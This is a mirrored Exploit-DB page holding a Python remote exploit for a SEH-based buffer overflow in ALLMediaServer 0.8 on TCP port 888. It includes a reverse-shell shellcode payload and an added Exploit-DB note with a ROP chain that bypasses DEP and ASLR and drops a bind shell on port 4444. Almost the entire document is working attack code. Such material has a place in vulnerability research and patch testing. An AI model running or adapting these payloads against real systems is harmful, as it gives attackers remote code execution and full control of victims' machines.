ALLMediaServer 0.8 – Remote Overflow (SEH)

  • 作者: motaz reda
    日期: 2012-07-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/19625/
  • # Exploit Title: seh exploit, BOF 
    # Date: 04/07/2012
    # Exploit Author: motaz reda 
    # my E-mail:motazkhodair@gmail.com
    # Software Link: http://allmediaserver.org/
    # Version: ALLMediaServer 0.8
    # Tested On: Windows 7 ultimate
    ################################################
    
    #!/usr/bin/python
    
    import sys, socket
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    s.connect((sys.argv[1], 888))
    
    buffer = "A" * 1072
    
    buffer += "\xeb\x06\x90\x90" #NSEHjmp short 6
    
    buffer += "\xca\x24\xec\x65" # SEHPOP POP RETN
    
    # msfpayload windows/shell_reverse_tcp 
    # you can replace the shellcode with any shellcode u want
    
    buffer += ("\xd9\xc8\xd9\x74\x24\xf4\xb8\xa6\xaa\xb6\xad\x5b\x2b\xc9\xb1"
    "\x4f\x83\xeb\xfc\x31\x43\x15\x03\x43\x15\x44\x5f\x4a\x45\x01"
    "\xa0\xb3\x96\x71\x28\x56\xa7\xa3\x4e\x12\x9a\x73\x04\x76\x17"
    "\xf8\x48\x63\xac\x8c\x44\x84\x05\x3a\xb3\xab\x96\x8b\x7b\x67"
    "\x54\x8a\x07\x7a\x89\x6c\x39\xb5\xdc\x6d\x7e\xa8\x2f\x3f\xd7"
    "\xa6\x82\xaf\x5c\xfa\x1e\xce\xb2\x70\x1e\xa8\xb7\x47\xeb\x02"
    "\xb9\x97\x44\x19\xf1\x0f\xee\x45\x22\x31\x23\x96\x1e\x78\x48"
    "\x6c\xd4\x7b\x98\xbd\x15\x4a\xe4\x11\x28\x62\xe9\x68\x6c\x45"
    "\x12\x1f\x86\xb5\xaf\x27\x5d\xc7\x6b\xa2\x40\x6f\xff\x14\xa1"
    "\x91\x2c\xc2\x22\x9d\x99\x81\x6d\x82\x1c\x46\x06\xbe\x95\x69"
    "\xc9\x36\xed\x4d\xcd\x13\xb5\xec\x54\xfe\x18\x11\x86\xa6\xc5"
    "\xb7\xcc\x45\x11\xc1\x8e\x01\xd6\xff\x30\xd2\x70\x88\x43\xe0"
    "\xdf\x22\xcc\x48\x97\xec\x0b\xae\x82\x48\x83\x51\x2d\xa8\x8d"
    "\x95\x79\xf8\xa5\x3c\x02\x93\x35\xc0\xd7\x33\x66\x6e\x88\xf3"
    "\xd6\xce\x78\x9b\x3c\xc1\xa7\xbb\x3e\x0b\xde\xfc\xa9\x74\x49"
    "\x03\x3e\x1d\x88\x03\x2f\x81\x05\xe5\x25\x29\x40\xbe\xd1\xd0"
    "\xc9\x34\x43\x1c\xc4\xdc\xe0\x8f\x83\x1c\x6e\xac\x1b\x4b\x27"
    "\x02\x52\x19\xd5\x3d\xcc\x3f\x24\xdb\x37\xfb\xf3\x18\xb9\x02"
    "\x71\x24\x9d\x14\x4f\xa5\x99\x40\x1f\xf0\x77\x3e\xd9\xaa\x39"
    "\xe8\xb3\x01\x90\x7c\x45\x6a\x23\xfa\x4a\xa7\xd5\xe2\xfb\x1e"
    "\xa0\x1d\x33\xf7\x24\x66\x29\x67\xca\xbd\xe9\x97\x81\x9f\x58"
    "\x30\x4c\x4a\xd9\x5d\x6f\xa1\x1e\x58\xec\x43\xdf\x9f\xec\x26"
    "\xda\xe4\xaa\xdb\x96\x75\x5f\xdb\x05\x75\x4a")
    
    s.send(buffer)
    
    s.close()
    
    ### Exploit-DB note:
    ### This affects AllMediaSErver 0.94 as well.
    
    # Exploit-DB Note:
    # Here's a ROP chain that will work on Windows 7 Pro Eng DEP AlwaysOn
    # DEP/ASLR bypass with bind shell on port 4444
    buffer = "\x41" * 984
    buffer+= "\xe6\x30\x46\x00"	# Second ADD esp for stack adjustment
    				# add esp,90 | pop esi | pop ebx | retn ~ MediaServer.exe
    buffer+= "\x41" * 88
    # Step over SEH
    stackAdjust = "\x9e\x6c\x42\x00"	# add esp,800 | pop ebx | retn ~ MediaServer.exe
    					# Returns to Second ADD ESP
    stackAdjust+= "\x42\x42\x42\x42" * 15	# Padding
    
    # VirtualProtect into ESI
    rop = "\x26\xfa\xf6\x65"	# pop eax | retn	 		~ avcodec-53.dll
    rop+= "\xe0\xe4\x1e\x67"	# &kernel32.VirtualProtect		~
    rop+= "\x54\xcd\xc6\x6a"	# mov eax,dword ptr ds:[eax] | retn	~
    rop+= "\x04\xef\x2e\x66"	# xchg eax,esi | retn			~ avcodec-53.dll
    				# Puts Kernel31.VirtualProtect
    # lpAddress param into EBP
    rop+= "\xb3\x14\xb8\x68"# pop ebp | retn 	~
    rop+= "\x07\x5d\x0c\x66"	# ROP jmp esp | ???			~ avcodec-53.dll
    
    # dwSize into EBX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn~ avcodec-53.dll
    rop+= "\xff\xfd\xff\xff"	# Will negate to 0x201
    rop+= "\xbe\x13\x6e\x66"# neg eax | retn
    rop+= "\x2b\xe2\xf4\x65"	# xchg eax,ebx | retn			~ avcodec-53.dll
    
    # flNewProtect 0x40 into EDX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn 	~ avcodec-53.dll
    rop+= "\xc0\xff\xff\xff"	# Will negate to 0x40
    rop+= "\xbe\x13\x6e\x66"# neg eax | retn~ avcodec-53.dll
    rop+= "\x46\x08\x53\x66"	# xchg eax,edx | retn			~ avcoded-53.dll
    
    # lpflOldProtect into ECX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn 	~ avcodec-53.dll
    rop+= "\x69\xef\x5f\x00"	# writeable address			~ avformat-53.dll
    rop+= "\xeb\x9b\x74\x66"	# xchg eax,ecx | retn			~ avcodec-53.dll
    
    # RETN into EDI
    rop+= "\x84\xe6\x75\x66"	# pop edi | retn
    rop+= "\x6d\x9b\xb2\x6a"	# retn ROP
    
    # Nops in EAX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn 	~ avcodec-53.dll
    rop+= "\x90\x90\x90\x90"
    
    # PushAD
    rop+= "\x3a\x18\x75\x66"	# pushad | rent				~ avodec-53.dll
    
    rop+= "\x90\x90\x90\x90"
    
    
    shellcode =(
    "\xba\x4b\xdb\xfb\xca\xdb\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9"
    "\xb1\x56\x31\x55\x13\x03\x55\x13\x83\xed\xb7\x39\x0e\x36"
    "\xaf\x37\xf1\xc7\x2f\x28\x7b\x22\x1e\x7a\x1f\x26\x32\x4a"
    "\x6b\x6a\xbe\x21\x39\x9f\x35\x47\x96\x90\xfe\xe2\xc0\x9f"
    "\xff\xc2\xcc\x4c\xc3\x45\xb1\x8e\x17\xa6\x88\x40\x6a\xa7"
    "\xcd\xbd\x84\xf5\x86\xca\x36\xea\xa3\x8f\x8a\x0b\x64\x84"
    "\xb2\x73\x01\x5b\x46\xce\x08\x8c\xf6\x45\x42\x34\x7d\x01"
    "\x73\x45\x52\x51\x4f\x0c\xdf\xa2\x3b\x8f\x09\xfb\xc4\xa1"
    "\x75\x50\xfb\x0d\x78\xa8\x3b\xa9\x62\xdf\x37\xc9\x1f\xd8"
    "\x83\xb3\xfb\x6d\x16\x13\x88\xd6\xf2\xa5\x5d\x80\x71\xa9"
    "\x2a\xc6\xde\xae\xad\x0b\x55\xca\x26\xaa\xba\x5a\x7c\x89"
    "\x1e\x06\x27\xb0\x07\xe2\x86\xcd\x58\x4a\x77\x68\x12\x79"
    "\x6c\x0a\x79\x16\x41\x21\x82\xe6\xcd\x32\xf1\xd4\x52\xe9"
    "\x9d\x54\x1b\x37\x59\x9a\x36\x8f\xf5\x65\xb8\xf0\xdc\xa1"
    "\xec\xa0\x76\x03\x8c\x2a\x87\xac\x59\xfc\xd7\x02\x31\xbd"
    "\x87\xe2\xe1\x55\xc2\xec\xde\x46\xed\x26\x69\x41\x23\x12"
    "\x3a\x26\x46\xa4\xad\xea\xcf\x42\xa7\x02\x86\xdd\x5f\xe1"
    "\xfd\xd5\xf8\x1a\xd4\x49\x51\x8d\x60\x84\x65\xb2\x70\x82"
    "\xc6\x1f\xd8\x45\x9c\x73\xdd\x74\xa3\x59\x75\xfe\x9c\x0a"
    "\x0f\x6e\x6f\xaa\x10\xbb\x07\x4f\x82\x20\xd7\x06\xbf\xfe"
    "\x80\x4f\x71\xf7\x44\x62\x28\xa1\x7a\x7f\xac\x8a\x3e\xa4"
    "\x0d\x14\xbf\x29\x29\x32\xaf\xf7\xb2\x7e\x9b\xa7\xe4\x28"
    "\x75\x0e\x5f\x9b\x2f\xd8\x0c\x75\xa7\x9d\x7e\x46\xb1\xa1"
    "\xaa\x30\x5d\x13\x03\x05\x62\x9c\xc3\x81\x1b\xc0\x73\x6d"
    "\xf6\x40\x83\x24\x5a\xe0\x0c\xe1\x0f\xb0\x50\x12\xfa\xf7"
    "\x6c\x91\x0e\x88\x8a\x89\x7b\x8d\xd7\x0d\x90\xff\x48\xf8"
    "\x96\xac\x69\x29")
    
    payload = buffer + stackAdjust + rop + shellcode
    rest = 1765 - len(payload)
    exploit = payload + "\xCC" * rest
    # Send exploit to target's port 888